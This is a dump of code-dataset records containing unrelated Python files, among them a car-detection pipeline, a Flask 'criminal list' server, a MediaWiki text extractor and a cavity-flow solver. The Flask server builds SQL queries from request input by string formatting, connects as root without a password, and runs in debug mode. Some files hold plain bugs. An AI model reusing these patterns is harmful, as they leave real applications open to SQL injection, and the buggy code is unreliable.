\r\n prediction = unSvm.predict(features)[1].ravel()\r\n \r\n for i in range(len(prediction)):\r\n if (prediction[i] == 1):\r\n bboxes.append( boxes[i] );\r\n \r\n return bboxes\r\n \r\n#%%\r\ndef draw_bboxes(img, bboxes):\r\n draw_img = np.copy(img)\r\n\r\n color = (0,0,255)\r\n thickness = 6\r\n\r\n\r\n for box in boxes:\r\n #print (\"detected at\", xb,yb, xbox_left, ytop_draw)\r\n cv2.rectangle(draw_img, tuple(box[0]), tuple(box[1]), color, thickness) \r\n return draw_img \r\n\r\n#%%\r\n\r\ndef boxes_multy_scale(img):\r\n global scales\r\n global window\r\n top = 400\r\n cell = 8 #cell size in pixels\r\n shift = 2 #shift in cells\r\n boxes = []\r\n for scale in scales:\r\n #bottom = top + np.int(window * scale) + 1\r\n bottom = top + np.int(window * scale + cell * shift * scale) + 1\r\n boxes.extend(find_cars(img, top, bottom, scale, mySvm, X_scaler, 11, \r\n cell, 2, window, shift))\r\n return boxes\r\n \r\ndef add_heat(heatmap, bbox_list, tau=0.9):\r\n # Iterate through list of bboxes\r\n heatmap = heatmap * tau\r\n for box in bbox_list:\r\n # Add += 1 for all pixels inside each bbox\r\n # Assuming each \"box\" takes the form ((x1, y1), (x2, y2))\r\n width = box[1][1]-box[0][1];\r\n height = box[1][0]-box[0][0];\r\n bx = np.ones(( width, height), np.float32) #/2\r\n #bx2 = np.ones((width//2, height//2), np.float32)/2\r\n #bx[width//4:(width + width//2)//2, height//4:(height+height//2)//2] += bx2 \r\n heatmap[box[0][1]:box[1][1], box[0][0]:box[1][0]] += bx\r\n\r\n # Return updated heatmap\r\n return heatmap# Iterate through list of bboxes\r\n \r\ndef draw_labeled_bboxes(img, labels):\r\n # Iterate through all detected cars\r\n for car_number in range(1, labels[1]+1):\r\n # Find pixels with each car_number label value\r\n nonzero = (labels[0] == car_number).nonzero()\r\n # Identify x and y values of those pixels\r\n nonzeroy = np.array(nonzero[0])\r\n nonzerox = np.array(nonzero[1])\r\n # Define a bounding box based on min/max x and y\r\n x0 = np.min(nonzerox)\r\n x1 = np.max(nonzerox)\r\n y0 = np.min(nonzeroy)\r\n y1 = np.max(nonzeroy)\r\n w = x1 - x0\r\n h = y1 - y0\r\n if (w > window * 2 and h > window * 2):\r\n bbox = ((x0, y0), (x1, y1))\r\n # Draw the box on the image\r\n cv2.rectangle(img, bbox[0], bbox[1], (0,100,0), 3)\r\n # Return the image\r\n return img\r\n \r\n#%%\r\n\r\n\r\n\r\n#main processing pipeline\r\ndef process_image(image):\r\n global heat;\r\n\r\n\r\n boxes = boxes_multy_scale(image)\r\n heat = add_heat(heat,boxes,tau)\r\n \r\n heat_thr = heat.copy();\r\n heat_thr[heat_thr < thr] = 0;\r\n\r\n labels = label(heat_thr)\r\n draw_img = draw_labeled_bboxes(np.copy(image), labels)\r\n\r\n return draw_img\r\n \r\n\r\n#%%\r\n\r\n","sub_path":"process_image.py","file_name":"process_image.py","file_ext":"py","file_size_in_byte":7873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"636006121","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.posts_list, name='posts_list'),\n path('post/', views.post_detail, name='post_detail'),\n path('post/new', views.post_new, name='post_new'),\n path('post//edit/', views.post_edit, name='post_edit'),\n path('post//answer/', views.add_answer, name=\"add_answer\")\n\n]\n","sub_path":"Homepage/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"434415344","text":"import re\nimport os\nimport pickle as pk\n\nhant_pattern = re.compile(r'public static \\$zh2Hant = \\[([^]]*)]', re.M)\npair_pattern = re.compile(r'\\'([^\\']+)\\' => \\'([^\\']+)\\'')\nhans_pattern = re.compile(r'public static \\$zh2Hans = \\[([^]]*)]', re.M)\npardir = os.path.abspath(__file__)\npardir = os.path.dirname(pardir)\n\ndef make_dict(data, pattern, file_path):\n with open(file_path, 'w', encoding='UTF-8') as fout:\n for p in pattern.findall(data):\n for pp in pair_pattern.findall(p):\n fout.write('%s\\t%s\\n' % pp)\n\ndef load_dict(file_path):\n conv = dict()\n conv['dict'] = dict()\n with open(file_path, 'r', encoding='UTF-8') as fin:\n for line in fin:\n line = line.strip().split('\\t')\n n = len(line[0])\n dd = conv['dict'].get(n, dict())\n dd[line[0]] = line[1]\n conv['dict'][n] = dd\n conv['length'] = sorted(list(conv['dict'].keys()), reverse=True)\n return conv\n\ndef abspath(path):\n global pardir\n return os.path.join(pardir, path)\n\ndef conv():\n with open(abspath('ZhConversion.php'), 'r', encoding='UTF-8') as fin:\n data = fin.read()\n make_dict(data, hant_pattern, abspath('zhhans2t.txt'))\n make_dict(data, hans_pattern, abspath('zhhant2s.txt'))\n\n zhhanz = dict()\n zhhanz['s2t'] = load_dict(abspath('zhhans2t.txt'))\n zhhanz['t2s'] = load_dict(abspath('zhhant2s.txt'))\n with open(abspath('zhhanz.pkl'), 'wb') as pkl:\n pk.dump(zhhanz, pkl)\n\n os.remove(abspath('zhhans2t.txt'))\n os.remove(abspath('zhhant2s.txt'))\n\nif __name__ == '__main__':\n conv()\n","sub_path":"php_conv.py","file_name":"php_conv.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"571864780","text":"class Solution:\n def isInterleave(self, s1: str, s2: str, s3: str) -> bool:\n r, c, l = len(s1), len(s2), len(s3)\n\n if r + c != l:\n return False\n\n queue, visited = [(0, 0)], set((0, 0))\n\n while queue:\n x, y = queue.pop(0)\n\n if x + y == l:\n return True\n\n if x + 1 <= r and s1[x] == s3[x + y] and (x + 1, y) not in visited:\n queue.append((x + 1, y))\n visited.add((x + 1, y))\n\n if y + 1 <= c and s2[y] == s3[x + y] and (x, y + 1) not in visited:\n queue.append((x, y + 1))\n visited.add((x, y + 1))\n\n return False\n","sub_path":"Leetcode/97. Interleaving String.py","file_name":"97. Interleaving String.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"226847542","text":"from flask import Flask, jsonify, flash, redirect, render_template, request, session, abort\nimport os\nimport pymysql as MySQLdb\nimport json\nfrom datetime import datetime\nfrom waitress import serve\n\nimport pandas as pd\nimport numpy as np\nimport webbrowser\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n return render_template('criminal_list.html')\n\n@app.route('/crimdetails')\ndef crimdetails(): \n #post = request.form.to_dict()\n #crimid = str(post['crimid'])\n crimid=request.args.get('cid') \n session['crimid']=crimid\n #webbrowser.open_new_tab('/templates/CriminalDetails.html') \n to_send={'status': '0', 'error': 'null'}\n return render_template('CriminalDetailsUI1.html')\n\n@app.route('/crimdetailsfromlist', methods=[\"POST\", \"GET\"])\ndef crimdetailsfromlist(): \n post = request.get_json()\n crimid = str(post.get('crimid')) \n session['crimid']=crimid\n #webbrowser.open_new_tab('/templates/CriminalDetails.html') \n to_send={'status': '0', 'error': 'null'}\n webbrowser.open_new_tab('http://127.0.0.1:5000/crimdetails?cid='+crimid)\n return to_send\n\n@app.route('/getCriminalsList', methods=[\"POST\", \"GET\"])\ndef getCriminalsList():\n db = MySQLdb.connect(\"localhost\", \"root\", \"\", \"criminal\")\n cursor = db.cursor()\n cursor.execute(\"select `cam_id`,`criminal_id`,`date`,`time` from criminal_list order by date desc\")\n data = cursor.fetchall()\n to_send = []\n for row in data:\n camid=row[0]\n crimid=row[1]\n cursor.execute(\"select `place` from cam_details where cam_id=%d\"%(camid))\n camdata=cursor.fetchall()\n cursor.execute(\"select `cname` from criminals where cid='%s'\"%(crimid))\n crimdata=cursor.fetchall()\n date=row[-2]\n time=row[-1]\n s=time.seconds\n hours, remainder = divmod(s, 3600)\n minutes, seconds = divmod(remainder, 60)\n t='{:02}:{:02}:{:02}'.format(int(hours), int(minutes), int(seconds))\n date = date.strftime('20%y-%m-%d')\n to_send.append({'name':crimdata[0][0],'place':camdata[0][0],'date':date,'time':t,'cid':crimid}) \n return jsonify(result=to_send)\n\n@app.route('/getText', methods=[\"POST\", \"GET\"])\ndef getText():\n post = request.form.to_dict()\n to_send = {'status': '0', 'error': 'null'}\n letter = str(post['letter'])\n db = MySQLdb.connect(\"localhost\", \"root\", \"\", \"criminal\")\n cursor = db.cursor()\n cursor.execute(\"update crimLetter set `name`= '%s'\"%(letter))\n to_send[\"status\"] = \"1\"\n to_send[\"error\"] = \"Password Changed Successfully!\"\n return to_send\n\n@app.route('/getCriminalsDetails', methods=[\"POST\", \"GET\"])\ndef getCriminalsDetails():\n crimid=session['crimid']\n db = MySQLdb.connect(\"localhost\", \"root\", \"\", \"criminal\")\n cursor = db.cursor()\n cursor.execute(\"select `cname`,`caddress`,`cage`,`cphone` from criminals where cid='%s'\"%(crimid))\n data = cursor.fetchall()\n to_send = []\n for row in data:\n to_send.append({'cid':crimid,'cname':row[0],'caddress':row[1],'cage':row[2],'cphone':row[3]})\n cdet=[]\n cursor.execute(\"select `crime`,`place`,`date`,`time` from crime_history where cid='%s' order by date desc\"%(crimid))\n data = cursor.fetchall()\n for row in data:\n date = row[2]\n time=row[-1]\n s=time.seconds\n hours, remainder = divmod(s, 3600)\n minutes, seconds = divmod(remainder, 60)\n t='{:02}:{:02}:{:02}'.format(int(hours), int(minutes), int(seconds))\n date = date.strftime('20%y-%m-%d')\n cdet.append({'crime': row[0], 'place': row[1], 'date': date, 'time': t}) \n to_send[0]['cdetails']=cdet \n cursor.execute(\"select cam_id from criminal_list where criminal_id='%s' order by date desc,time desc\"%(crimid))\n data=cursor.fetchall()\n loc=[]\n for i in data:\n camid=i[0]\n cursor.execute(\"select place,latitude,longitude from cam_details where cam_id=%d\"%(camid))\n loc_data=cursor.fetchall()[0]\n loc.append({'place':loc_data[0],'latitude':loc_data[1],'longitude':loc_data[2]})\n to_send[0]['locations']=loc \n return jsonify(result=to_send)\n\n@app.route('/insertCrimList', methods=[\"POST\", \"GET\"])\ndef insertCrimList():\n db = MySQLdb.connect(\"localhost\", \"root\", \"\", \"criminal\")\n cursor = db.cursor()\n post = request.form.to_dict()\n crimid = str(post['crimid'])\n camid = str(post['cam_id'])\n stime = str(post['time'])\n sdate = str(post['date'])\n print(crimid,camid,stime,sdate)\n cursor.execute(\"insert into criminal_list (`date`, `time`, `cam_id`, `criminal_id`) values('%s','%s','%s','%s')\"%(sdate,stime,camid,crimid))\n #webbrowser.open_new_tab('http://127.0.0.1:5000/crimdetails?cid='+crimid)\n to_send = {'status': '1'}\n return jsonify(result=to_send)\n\nif __name__ == \"__main__\":\n app.secret_key = os.urandom(12)\n #serve(app, host='0.0.0.0', port=8080)\n app.run(threaded=True,debug=True)\n","sub_path":"WebServer.py","file_name":"WebServer.py","file_ext":"py","file_size_in_byte":4914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"448688763","text":"from collections import deque\nN=int(input())\nmaps=[[0]*N for _ in range(N)]\n\n# 사과가 있는 곳 1로 변경\nfor y,x in list(map(int, input().split())): maps[y-1][x-1]=1\n\n# 머리가 동,서,남,북 방향에 있을 때 전진하는 좌표와 D, L 방향의 y,x 이동 좌표\ndir={1:[(0,1),(-1,0),(1,0)], 2:[(0,-1),(-1,0),(1,0)], 3:[(1,0), (0,-1),(0,1)], 4:[(-1,0),(0,1),(0,-1)]} \nrotate=deque()\nfor t, d in range(int(input())):\n if d=='D': # 오른쪽으로 90도 회전\n rotate.append((t, 1))\n elif d=='L': # 왼쪽으로 90도 회전\n rotate.append((t, 2))\n\nhead=1 # 초기 뱀의 머리,꼬리는 오른쪽(동쪽) 방향에 있음\nmaps[0][0]=2; # 뱀이 있는 곳 2로 변경\ncury=0; curx=0\ntaily=0; tailx=0\nnexttaily=0; nexttailx=0\ntic=0\n\nwhile True:\n if rotate and tic==rotate[0][0]: \n nextd=rotate[0][1]; rotate.popleft()\n else: nextd=0\n nexty, nextx=cury+dir[head][nextd][0], curx+dir[head][nextd][1]\n \n if nexty==0 or nexty==N-1 or nextx==0 or nextx==N-1 or maps[nexty][nextx]==2:\n break\n \n if maps[nexty][nextx]==1:\n maps[nexty][nextx]=2\n else:\n maps[taily][tailx]=0\n \n tic+=1\n cury, curx=nexty, nextx\n\n \n\n","sub_path":"Algorithm/BOJ_3190_뱀.py","file_name":"BOJ_3190_뱀.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"386349827","text":"import re\nfrom pyspark import SparkConf, SparkContext\n\ndef normalizeWords(text):\n return re.compile(r'\\w+',re.UNICODE).split(text.lower())\n\nconf = SparkConf().setMaster(\"local\").setAppName(\"wordCounts\")\n\nsc = SparkContext(conf = conf)\n\ninput = sc.textFile(\"book.txt\")\nwords = input.flatMap(normalizeWords)\nwordCount = words.map(lambda x:(x,1)).reduceByKey(lambda x, y : x+y)\nwordCountSorted= wordCount.map(lambda x:(x[1],x[0])).sortByKey()\nresults = wordCountSorted.collect()\n\nfor results in results:\n count = str(result[0])\n word = result[1].encode('ascii', 'ignore')\n\n if(word):\n print(word.decode() + \":\\t\\t\" +count)\n","sub_path":"sorted_word_count.py","file_name":"sorted_word_count.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"408189374","text":"import unittest\nimport numpy as np\nimport pandas as pd\nfrom training.training import model_training\n\n\n# create dataframe for testing the preprocessing functions:\ndef mock_data(number_of_samples):\n integer_array = np.random.randint(2, size=(number_of_samples, 2))\n for categories_numbers in range(5, 50, 10):\n integer_array = np.append(\n integer_array, np.random.randint(categories_numbers, size=(number_of_samples, 2)), axis=1\n )\n integer_columns = [f\"int_col_{x}\" for x in range(integer_array.shape[1])]\n\n continuous_array = np.random.randn(number_of_samples, 10)\n continuous_columns = [f\"cont_col_{x}\" for x in range(continuous_array.shape[1])]\n\n integer_dataframe = pd.DataFrame(integer_array, columns=integer_columns)\n continuous_dataframe = pd.DataFrame(continuous_array, columns=continuous_columns)\n\n dataframe = pd.concat([integer_dataframe, continuous_dataframe], axis=1)\n target = (np.sum(continuous_array, axis=1) - 1) / (1 + np.sum(integer_array, axis=1))\n return dataframe, target\n\n\ntrain_dataframe, train_target = mock_data(1000)\nvalid_dataframe, valid_target = mock_data(100)\ntest_dataframe, test_target = mock_data(100)\n\nparameters_linear = {\n \"data\": {\n \"train\": {\"features\": train_dataframe, \"target\": train_target},\n \"valid\": {\"features\": valid_dataframe, \"target\": valid_target},\n \"test\": {\"features\": test_dataframe, \"target\": test_target},\n },\n \"split\": {\n \"method\": \"split\", # \"method\":\"kfold\"\n \"split_ratios\": 0.2, # foldnr:5 , \"split_ratios\": 0.8 # \"split_ratios\":(0.7,0.2)\n },\n \"model\": {\"type\": \"Ridge linear regression\",\n \"hyperparameters\": {\"alpha\": 1, # alpha:optimize\n },\n },\n \"metrics\": [\"r2_score\", \"mean_squared_error\"],\n \"predict\": {\n \"test\": {\"features\": test_dataframe}\n }\n}\n\nparameters_lightgbm = {\n \"data\": {\n \"train\": {\"features\": train_dataframe, \"target\": train_target},\n \"valid\": {\"features\": valid_dataframe, \"target\": valid_target},\n \"test\": {\"features\": test_dataframe, \"target\": test_target},\n },\n \"split\": {\n \"method\": \"split\", # \"method\":\"kfold\"\n \"split_ratios\": 0.2, # foldnr:5 , \"split_ratios\": 0.8 # \"split_ratios\":(0.7,0.2)\n },\n \"model\": {\"type\": \"lightgbm\",\n \"hyperparameters\": dict(objective='regression', metric='root_mean_squared_error', num_leaves=5,\n boost_from_average=True,\n learning_rate=0.05, bagging_fraction=0.99, feature_fraction=0.99, max_depth=-1,\n num_rounds=10000, min_data_in_leaf=10, boosting='dart')\n },\n \"metrics\": [\"r2_score\", \"mean_squared_error\"],\n \"predict\": {\n \"test\": {\"features\": test_dataframe}\n }\n}\n\n\nclass MyTestCase(unittest.TestCase):\n def test_something(self):\n model_lists, model_dir = model_training(parameters_linear)\n self.assertEqual(model_lists, [\"0\"])\n # self.assertEqual(model_dir, 0)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"training/test_training.py","file_name":"test_training.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"6546072","text":"#!/usr/bin/env python2\n#\n# usage:\n# $ mwwiki2txt.py -n10 -t 'article%(pageid)05d.txt' jawiki.xml.bz2\n#\nimport re\nimport sys\nfrom gzip import GzipFile\nfrom bz2 import BZ2File\ntry:\n from cStringIO import StringIO\nexcept ImportError:\n from StringIO import StringIO\nfrom pymwp.mwtokenizer import WikiToken, XMLTagToken, XMLEmptyTagToken\nfrom pymwp.mwparser import WikiTextParser\nfrom pymwp.mwparser import WikiTree, WikiXMLTree, WikiArgTree\nfrom pymwp.mwparser import WikiSpecialTree, WikiCommentTree\nfrom pymwp.mwparser import WikiKeywordTree, WikiLinkTree\nfrom pymwp.mwparser import WikiSpanTree, WikiDivTree\nfrom pymwp.mwparser import WikiTableTree, WikiTableCellTree\nfrom pymwp.mwxmldump import MWXMLDumpFilter\nfrom pymwp.pycdb import CDBReader, CDBMaker\n\n\nSPC = re.compile(r'\\s+')\ndef rmsp(s): return SPC.sub(' ', s)\n\nIGNORED = re.compile(u'^([-a-z]+|Category|Special):')\ndef isignored(name): return IGNORED.match(name)\n\n\n## WikiTextExtractor\n##\nclass WikiTextExtractor(WikiTextParser):\n\n def __init__(self, errfp=sys.stderr, codec='utf-8'):\n WikiTextParser.__init__(self)\n self.errfp = errfp\n self.codec = codec\n return\n\n def error(self, s):\n self.errfp.write(s)\n return\n\n def invalid_token(self, pos, token):\n if self.errfp is not None:\n self.error('invalid token(%d): %r\\n' % (pos, token))\n return\n\n def convert(self, fp, tree=None):\n if tree is None:\n self.convert(fp, self.get_root())\n elif tree is WikiToken.PAR:\n fp.write('\\n')\n elif isinstance(tree, XMLEmptyTagToken):\n if tree.name in XMLTagToken.BR_TAG:\n fp.write('\\n')\n elif isinstance(tree, unicode):\n fp.write(rmsp(tree).encode(self.codec, 'ignore'))\n elif isinstance(tree, WikiSpecialTree):\n pass\n elif isinstance(tree, WikiCommentTree):\n pass\n elif isinstance(tree, WikiXMLTree):\n if tree.xml.name in XMLTagToken.NO_TEXT:\n pass\n else:\n for c in tree:\n self.convert(fp, c)\n if tree.xml.name in XMLTagToken.PAR_TAG:\n fp.write('\\n')\n elif isinstance(tree, WikiKeywordTree):\n if tree:\n if isinstance(tree[0], WikiTree):\n name = tree[0].get_text()\n else:\n name = tree[0]\n if isinstance(name, unicode) and not isignored(name):\n self.convert(fp, tree[-1])\n elif isinstance(tree, WikiLinkTree):\n if 2 <= len(tree):\n for c in tree[1:]:\n self.convert(fp, c)\n fp.write(' ')\n elif tree:\n self.convert(fp, tree[0])\n elif isinstance(tree, WikiTableCellTree):\n if tree:\n self.convert(fp, tree[-1])\n fp.write('\\n')\n elif isinstance(tree, WikiTableTree):\n for c in tree:\n if not isinstance(c, WikiArgTree):\n self.convert(fp, c)\n elif isinstance(tree, WikiDivTree):\n for c in tree:\n self.convert(fp, c)\n fp.write('\\n')\n elif isinstance(tree, WikiTree):\n for c in tree:\n self.convert(fp, c)\n return\n\n\n## WikiLinkExtractor\n##\nclass WikiLinkExtractor(WikiTextParser):\n\n def __init__(self, errfp=sys.stderr, codec='utf-8'):\n WikiTextParser.__init__(self)\n self.errfp = errfp\n self.codec = codec\n return\n\n def error(self, s):\n self.errfp.write(s)\n return\n\n def invalid_token(self, pos, token):\n if self.errfp is not None:\n self.error('invalid token(%d): %r\\n' % (pos, token))\n return\n\n def convert(self, fp, tree=None):\n if tree is None:\n self.convert(fp, self.get_root())\n elif isinstance(tree, WikiKeywordTree):\n if tree:\n if isinstance(tree[0], WikiTree):\n name = tree[0].get_text()\n else:\n name = tree[0]\n if isinstance(name, unicode):\n fp.write('keyword\\t'+name.encode(self.codec, 'ignore'))\n if 2 <= len(tree) and not isignored(name):\n text = tree[-1].get_text()\n fp.write('\\t'+text.encode(self.codec, 'ignore'))\n fp.write('\\n')\n elif isinstance(tree, WikiLinkTree):\n if tree:\n if isinstance(tree[0], WikiTree):\n url = tree[0].get_text()\n else:\n url = tree[0]\n if isinstance(url, unicode):\n fp.write('link\\t'+url.encode(self.codec, 'ignore'))\n if 2 <= len(tree):\n text = tree[-1].get_text()\n fp.write('\\t'+text.encode(self.codec, 'ignore'))\n fp.write('\\n')\n elif isinstance(tree, WikiTree):\n for c in tree:\n self.convert(fp, c)\n return\n\n\n## MWDump2Text\n##\nclass MWDump2Text(MWXMLDumpFilter):\n\n def __init__(self, factory,\n outfp=sys.stdout, codec='utf-8', titleline=True,\n titlepat=None, revisionlimit=1):\n MWXMLDumpSplitter.__init__(\n self,\n titlepat=titlepat, revisionlimit=revisionlimit)\n self.factory = factory\n self.codec = codec\n self.outfp = outfp\n self.titleline = titleline\n return\n\n def open_file(self, pageid, title, revision):\n print >>sys.stderr, (title,revision)\n if self.titleline:\n self.write(title+'\\n')\n self._textparser = self.factory(self.codec)\n return self.outfp\n \n def write_file(self, fp, text):\n self._textparser.feed_text(text)\n return\n \n def close_file(self, fp):\n self._textparser.close()\n self._textparser.convert(fp)\n self.write('\\f\\n')\n return\n\n\n## MWCDB2Text\n##\nclass MWCDB2Text(object):\n\n def __init__(self, srcpath, dstpath, factory):\n self.reader = CDBReader(srcpath)\n self.writer = CDBMaker(dstpath)\n self.factory = factory\n return\n\n def close(self):\n self.writer.finish()\n return\n\n def convert(self, pageid, revision=0):\n key = '%d/%d' % (pageid, revision)\n srcbuf = StringIO(self.reader[key])\n src = GzipFile(mode='r', fileobj=srcbuf)\n dstbuf = StringIO()\n dst = GzipFile(mode='w', fileobj=dstbuf)\n textparser = self.factory('utf-8')\n textparser.feed_text(src.read().decode('utf-8'))\n textparser.close()\n textparser.convert(dst)\n src.close()\n dst.close()\n self.writer.add(key, dstbuf.getvalue())\n key = '%d:title' % pageid\n self.writer.add(key, self.reader[key])\n return\n\n def convert_all(self):\n for key in self.reader:\n try:\n i = key.rindex('/')\n pageid = int(key[:i])\n revision = int(key[i+1:])\n except ValueError:\n continue\n print >>sys.stderr, (pageid,revision)\n self.convert(pageid, revision)\n return\n\n\n# main\ndef main(argv):\n import getopt\n def getfp(path, mode='r'):\n if path == '-' and mode == 'r':\n return sys.stdin\n elif path == '-' and mode == 'w':\n return sys.stdout\n elif path.endswith('.gz'):\n return GzipFile(path, mode=mode)\n elif path.endswith('.bz2'):\n return BZ2File(path, mode=mode)\n else:\n return open(path, mode=mode+'b')\n def usage():\n print ('usage: %s [-X xmldump] [-C cdbdump] [-o output] [-c codec] [-T] [-L] '\n '[-e titlepat] [-r revisionlimit] [file ...]') % argv[0]\n return 100\n try:\n (opts, args) = getopt.getopt(argv[1:], 'X:C:o:c:TLe:r:')\n except getopt.GetoptError:\n return usage()\n xmldump = None\n cdbdump = None\n output = None\n codec = 'utf-8'\n titlepat = None\n revisionlimit = 1\n titleline = False\n factory = (lambda codec: WikiTextExtractor(codec=codec))\n for (k, v) in opts:\n if k == '-X': xmldump = v\n elif k == '-C': cdbdump = v\n elif k == '-o': output = v\n elif k == '-c': codec = v \n elif k == '-T': titleline = True\n elif k == '-L': factory = (lambda codec: WikiLinkExtractor(codec=codec))\n elif k == '-e': titlepat = re.compile(v)\n elif k == '-r': revisionlimit = int(v)\n if xmldump is not None:\n outfp = getfp(output or '-', 'w')\n parser = MWDump2Text(\n factory, outfp=outfp,\n codec=codec, titleline=titleline,\n titlepat=titlepat, revisionlimit=revisionlimit)\n fp = getfp(xmldump)\n parser.feed_file(fp)\n fp.close()\n parser.close()\n elif cdbdump is not None:\n if not output: return usage()\n reader = MWCDB2Text(cdbdump, output, factory)\n if args:\n for pageid in args:\n reader.convert(int(pageid))\n else:\n try:\n reader.convert_all()\n finally:\n reader.close()\n else:\n outfp = getfp(output or '-', 'w')\n for path in (args or ['-']):\n print >>sys.stderr, path\n parser = factory(codec)\n fp = getfp(path)\n parser.feed_file(fp)\n fp.close()\n parser.close()\n parser.convert(outfp)\n return\n\nif __name__ == '__main__': sys.exit(main(sys.argv))\n","sub_path":"tools/mwwiki2txt.py","file_name":"mwwiki2txt.py","file_ext":"py","file_size_in_byte":9723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"130436556","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jan 2 15:32:51 2019\r\n\r\n@author: Benjamin Ihme\r\n\"\"\"\r\n\r\n#a)\r\n\r\nimport numpy as np\r\nfrom math import sqrt\r\nimport os\r\nimport argparse\r\n\r\n#get paths\r\nparser=argparse.ArgumentParser(description=\"Driven-Cavity-Problem\")\r\nparser.add_argument('--input', type=str, required=True, help=\"Input file containing the parameters for the driven cavity problem\")\r\nparser.add_argument('--output', type=str, required=True, help=\"Base name for output files that result from driven cavity problem\")\r\nargs=parser.parse_args()\r\ninputname=args.input\r\noutputname=args.output\r\n\r\n#write all the functions from task a)\r\n\r\n\r\n#reads parameters from file (file has to be in the format from exercise sheet)\r\n#returns imax,jmax,xlength,ylength,delt,t_end,tau,del_vec,eps,omg,alpha,itermax,GX,GY,Re,UI,VI,PI\r\n#which are all integers of floats \r\n#UI,VI,PI are constants with which the matrices are filled\r\ndef read_parameters_from_file(filename):\r\n with open(filename, 'r') as myfile:\r\n imax=int(str(myfile.readline()).partition(\"=\")[2])\r\n jmax=int(str(myfile.readline()).partition(\"=\")[2])\r\n xlength=float(str(myfile.readline()).partition(\"=\")[2])\r\n ylength=float(str(myfile.readline()).partition(\"=\")[2])\r\n delt=float(str(myfile.readline()).partition(\"=\")[2])\r\n t_end=float(str(myfile.readline()).partition(\"=\")[2])\r\n tau=float(str(myfile.readline()).partition(\"=\")[2])\r\n del_vec=float(str(myfile.readline()).partition(\"=\")[2])\r\n eps=float(str(myfile.readline()).partition(\"=\")[2])\r\n omg=float(str(myfile.readline()).partition(\"=\")[2])\r\n alpha=float(str(myfile.readline()).partition(\"=\")[2])\r\n itermax=int(str(myfile.readline()).partition(\"=\")[2])\r\n GX=float(str(myfile.readline()).partition(\"=\")[2])\r\n GY=float(str(myfile.readline()).partition(\"=\")[2])\r\n Re=int(str(myfile.readline()).partition(\"=\")[2])\r\n UI=float(str(myfile.readline()).partition(\"=\")[2])\r\n VI=float(str(myfile.readline()).partition(\"=\")[2])\r\n PI=float(str(myfile.readline()).partition(\"=\")[2])\r\n return imax,jmax,xlength,ylength,delt,t_end,tau,del_vec,eps,omg,alpha,itermax,GX,GY,Re,UI,VI,PI\r\n\r\n\r\n#initializes U,V and P according to UI,VI,PI \r\ndef initialize_fields_UVP(imax,jmax, UI, VI, PI):\r\n U=np.zeros([imax+2,jmax+2],float)\r\n V=np.zeros([imax+2,jmax+2],float)\r\n P=np.zeros([imax+2,jmax+2],float)\r\n for i in range(1,imax+1):\r\n for j in range(1,jmax+1):\r\n U[i][j]=UI\r\n V[i][j]=VI\r\n P[i][j]=PI\r\n return U,V,P\r\n\r\n\r\n#applies boundary conditions (17, 18) to U and V\r\ndef apply_boundary_conditions_UV_2(imax, jmax, U, V):\r\n for j in range(1,jmax+1):\r\n U[0][j]=0\r\n U[imax][j]=0\r\n V[0][j]=-V[1][j]\r\n V[imax+1][j]=-V[imax][j]\r\n for i in range(1,imax+1):\r\n U[i][0]=-U[i][1]\r\n U[i][jmax+1]=-U[i][jmax]\r\n V[i][0]=0\r\n V[i][jmax]=0\r\n \r\n#applies boundary conditions V and to U according to task b)\r\ndef apply_boundary_conditions_UV(imax, jmax, U, V):\r\n for j in range(1,jmax+1):\r\n U[0][j]=0\r\n U[imax][j]=0\r\n V[0][j]=-V[1][j]\r\n V[imax+1][j]=-V[imax][j]\r\n for i in range(1,imax+1):\r\n U[i][0]=-U[i][1]\r\n U[i][jmax+1]=2-U[i][jmax]\r\n V[i][0]=0\r\n V[i][jmax]=0\r\n \r\ndef calculate_delx_dely(imax,jmax,xlength,ylength):\r\n return xlength/imax, ylength/jmax\r\n\r\ndef calculate_delt(tau,Re,delx,dely,U,V, delt):\r\n if(tau<0):\r\n return delt\r\n umax=float(max(np.amax(U), abs(np.amin(U))))\r\n vmax=float(max(np.amax(U), abs(np.amin(U))))\r\n if umax==0:\r\n if vmax==0:\r\n return tau*(Re/2.0)*(1.0/((1.0/(delx*delx))+(1.0/(dely*dely))))\r\n else:\r\n return tau*min((Re/2.0)*(1.0/((1.0/(delx*delx))+(1.0/(dely*dely)))), dely/vmax)\r\n else:\r\n if vmax==0:\r\n return tau*min((Re/2.0)*(1.0/((1.0/(delx*delx))+(1.0/(dely*dely)))), delx/umax)\r\n else:\r\n return tau*min((Re/2.0)*(1.0/((1.0/(delx*delx))+(1.0/(dely*dely)))), delx/umax, dely/vmax)\r\n\r\n#calculates F and G from U and V and applies boundary conditions\r\n#F and G have to exist already\r\n#has no return value\r\ndef calculate_F_G(imax, jmax, delt, delx, dely, alpha, GX, GY, U, V, F, G):\r\n #apply boundary conditions first\r\n for j in range(1, jmax+1):\r\n F[0][j]=U[0][j]\r\n F[imax][j]=U[imax][j]\r\n for i in range(1, imax):\r\n G[i][0]=V[i][0]\r\n G[i][jmax]=V[i][jmax]\r\n #now the rest\r\n for i in range(1,imax):\r\n for j in range(1, jmax+1):\r\n ddudxx=(U[i+1][j]-2*U[i][j]+U[i-1][j])/(delx*delx)\r\n 